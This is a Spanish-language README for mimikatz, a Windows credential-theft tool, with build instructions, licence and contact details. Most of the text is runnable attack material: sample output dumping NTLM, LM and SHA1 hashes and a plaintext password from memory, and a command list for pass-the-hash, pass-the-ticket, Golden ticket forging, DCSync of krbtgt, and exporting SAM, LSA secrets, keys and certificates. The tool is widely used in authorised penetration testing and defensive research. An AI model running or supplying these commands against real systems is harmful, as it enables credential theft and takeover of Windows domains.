
Una pequeña herramienta para jugar con la seguridad de Windows
mimikatz es una herramienta que creé para aprender C y hacer algunos experimentos con la seguridad de Windows.
Ahora es bien conocida por extraer contraseñas en texto plano, hashes, códigos PIN y tickets de Kerberos de la memoria. mimikatz también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
¡Pero eso no es todo! Crypto, Terminal Server, Events, ... mucha información en la Wiki de GitHub https://github.com/gentilkiwi/mimikatz/wiki o en https://blog.gentilkiwi.com (en francés, sí).
Si no quieres compilarlo, los binarios están disponibles en https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz se presenta en forma de una solución de Visual Studio y un controlador WinDDK (opcional para operaciones principales), por lo que los requisitos previos son:
mimikatz y mimilib : Visual Studio 2010, 2012 o 2013 para escritorio (2013 Express para escritorio es gratuito y soporta x86 y x64 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver, mimilove (y la plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz utiliza SVN para el control de versiones, ¡pero ahora también está disponible con GIT!
Puedes usar cualquier herramienta que desees para sincronizar, incluso el GIT incorporado en Visual Studio 2013 =)
Build / Build Solution (puedes cambiar la arquitectura)mimikatz ya está compilado y listo para usar! (Win32 / x64 incluso ARM64 si tienes suerte)
MSB3073 relacionado con _build_.cmd y mimidrv, esto se debe a que el controlador no se puede compilar sin Windows Driver Kit 7.1 (WinDDK), pero mimikatz y mimilib funcionan correctamente.Con esta plataforma opcional de MSBuild, puedes usar las herramientas de compilación de WinDDK y el runtime predeterminado msvcrt (binarios más pequeños, sin dependencias).
Para esta plataforma opcional, son obligatorios Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 y Visual Studio 2010, incluso si planeas usar Visual Studio 2012 o 2013 más tarde.
Sigue las instrucciones:
El proyecto mimikatz está disponible en AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Su estado es:
Licencia CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
mimikatz necesita café para ser desarrollado:
gentilkiwi, puedes contactarme en Twitter ( @gentilkiwi ) o por correo electrónico ( benjamin [at] gentilkiwi.com )lsadump fueron coescritas con Vincent LE TOUX, puedes contactarlo por correo electrónico ( vincent.letoux [at] gmail.com ) o visitar su sitio web ( http://www.mysmartlogon.com )Este es un desarrollo personal, por favor respeta su filosofía y no lo uses para cosas malas.